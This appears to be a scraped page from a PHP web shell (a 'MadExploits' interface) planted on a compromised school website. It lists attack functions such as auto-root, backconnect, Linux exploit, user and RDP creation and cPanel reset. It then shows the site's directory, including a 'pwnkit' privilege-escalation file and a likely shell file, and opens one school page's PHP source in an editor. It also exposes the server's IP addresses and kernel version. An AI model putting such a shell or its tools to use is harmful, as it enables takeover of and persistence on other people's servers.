Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 3.21.248.105
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
home /
amvm /
public_html /
dhuggakalan /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
files
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
myadmin
[ DIR ]
drwxr-xr-x
scss
[ DIR ]
drwxr-xr-x
.htaccess
197
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
about.php
13.82
KB
-rw-r--r--
academic.php
10.43
KB
-rw-r--r--
addmission.php
1.76
KB
-rw-r--r--
bootstrap.php
79.58
KB
-rw-r--r--
cbse-corner.php
3.3
KB
-rw-r--r--
config.php
624
B
-rw-r--r--
contact.php
1.84
KB
-rw-r--r--
error_log
79.37
MB
-rw-r--r--
favicon.ico
2.56
KB
-rw-r--r--
footer.php
6.02
KB
-rw-r--r--
gallery.php
1.55
KB
-rw-r--r--
header.php
10.86
KB
-rw-r--r--
index.php
20.99
KB
-rw-r--r--
link.php
28.3
KB
-rw-r--r--
news-coverage.php
1.63
KB
-rw-r--r--
pedagogy.php
1.22
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
result.php
1.29
KB
-rw-r--r--
tc.php
3.14
KB
-rw-r--r--
theschool.php
7.08
KB
-rw-r--r--
wp-blog.php
191.22
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : theschool.php
<?php include('header.php'); ?> <div class="site-section ftco-subscribe-1 site-blocks-cover pb-4" style="background-image: url('images/bg_1.jpg')"> <div class="container"> <div class="row align-items-end"> <div class="col-lg-6"> <h2 class="mb-0">The School</h2> </div> <div class="col-lg-6 text-right"> <a href="index.php">Home</a> <span class="mx-3 icon-keyboard_arrow_right"></span> <span class="current">The School</span> </div> </div> </div> </div> <!--Why Us Start--> <div class="site-section"> <div class="container-fluid"> <div class="row justify-content-center text-center"> <div class="col-lg-4"> <h2 class="section-title-underline mb-5"> <span>The School</span> </h2> </div> </div> <div class="row"> <div class="col-lg-12"> <div class="tab"> <button class="tablinks" onclick="openField(event, 'Campus')"><div><span class="fa fa-building"></span></div>Campus</button> <button class="tablinks" onclick="openField(event, 'Lab')"><div><span class="fa fa-flask"></span></div>Lab</button> <button class="tablinks" onclick="openField(event, 'Library')"><div><span class="fa fa-book"></span></div>Library</button> <button class="tablinks" onclick="openField(event, 'Transport')"><div><span class="fa fa-bus"></span></div>Transport </button> <button class="tablinks" onclick="openField(event, 'Computer')"><div><span class="fa fa-desktop"></span></div>Computer Lab </button> <button class="tablinks" onclick="openField(event, 'Maths')"><div><span class="fa fa-calculator"></span></div>Maths Lab </button> </div> <div id="Campus" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '38'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?></h3> <p style="text-align:justify"><?php echo $row['description'];?></p> <div class="tab-inbox"> <img src="/images/campus1.jpg" width="250"/> </div> <div class="tab-inbox"> <img src="/images/campus2.jpg" width="250"/> </div> <div class="tab-inbox"> <img src="/images/campus3.jpg" width="250"/> </div> <div class="tab-inbox"> <img src="/images/campus4.jpg" width="250"/> </div> <?php } ?> </div> <div id="Lab" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '29'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?></h3> <p style="text-align:justify"><?php echo $row['description'];?></p> <div class="tab-inbox"> <img src="/images/lab3.jpeg" width="300"/> </div> <div class="tab-inbox"> <img src="/images/lab4.jpeg" width="300"/> </div> <?php } ?> </div> <div id="Library" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '30'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?></h3> <p style="text-align:justify"><?php echo $row['description'];?> </p> <div class="tab-inbox"> <img src="/images/lab1.jpg" width="300"/> </div> <div class="tab-inbox"> <img src="/images/lab2.jpg" width="300"/> </div> <?php } ?> </div> <div id="Transport" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '39'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?> </h3> <p style="text-align:justify"><?php echo $row['description'];?></p> <div class="tab-inbox"> <!--<img src="/images/dymmy.jpg" width="300"/>--> </div> <?php } ?> </div> <div id="Computer" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '42'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?> </h3> <p style="text-align:justify"><?php echo $row['description'];?></p> <div class="tab-inbox"> <img src="/images/computer1.jpg" width="300"/> </div> <div class="tab-inbox"> <img src="/images/computer2.jpg" width="300"/> </div> <?php } ?> </div> <div id="Maths" class="tabcontent"> <?php $qurey = "SELECT * FROM `pages` WHERE status='active' AND `id`= '43'"; $result = mysqli_query($con, $qurey); while($row = mysqli_fetch_array($result)) { ?> <h3><?php echo $row['title'];?> </h3> <p style="text-align:justify"><?php echo $row['description'];?></p> <div class="tab-inbox"> <img src="/images/maths1.jpeg" width="300"/> </div> <div class="tab-inbox"> <img src="/images/maths2.jpeg" width="300"/> </div> <div class="tab-inbox"> <img src="/images/maths3.jp3g" width="300"/> </div> <?php } ?> </div> <div class="dt-sc-margin25"></div> </div> </div> </div> </div> <!--Features End--> <!--opportunities Start--> <div class="section-bg" > <div class="container-fluid"> <div class="row"> <div class="col-lg-6 variety-box"> <div class="dt-sc-margin50"></div> <h3 class="section-title-underline" style="text-align: center;"> <span>Get to Know More About Akal Academy Dhugga Kalan</span> </h3> <div class="dt-sc-margin25"></div> <p class="lead" style="text-align:center">Call Us At: 9875987399, 9875987258</p> <div class="dt-sc-margin25"></div> <h4 class="section-title-underline" style="text-align: center;"> <span>HISTORY OF AKAL ACADEMY DHUGGA KALAN</span> </h4> <p style="text-align:justify;" >Ensconced amid the tranquil and refreshing ambience of the countryside of the historical village (birth place of Sant Baba HARNAM SINGH JI) Dhugga Kalan (Distt.- Hoshiarpur) stands the grand edifice of Akal Academy . It is not just an unparalleled educational institution but a celestial vision envisaged by reverend Sant Teja Singh Ji and Sant Attar Singh Ji; who envisioned up a unique model of education in which vocational and spiritual knowledge are perfectly dovetailed. They propound such education because they did not want our present generations to endeavour towards attaining this novel aim of Sant Attar Singh Ji. Sardar Rawal Singh Dhugga Ji’s family donated land for this sacred mission. </p> </div> <div class="col-lg-6 variety-box"><br> <figure class="thumnail" style="text-align: center;"> <img src="/images/the-school.jpg" alt="School Image" class="img-fluid" width="700" > </figure> </div> </div> </div> </div> <!--opportunities End--> <?php include('footer.php'); ?>
Close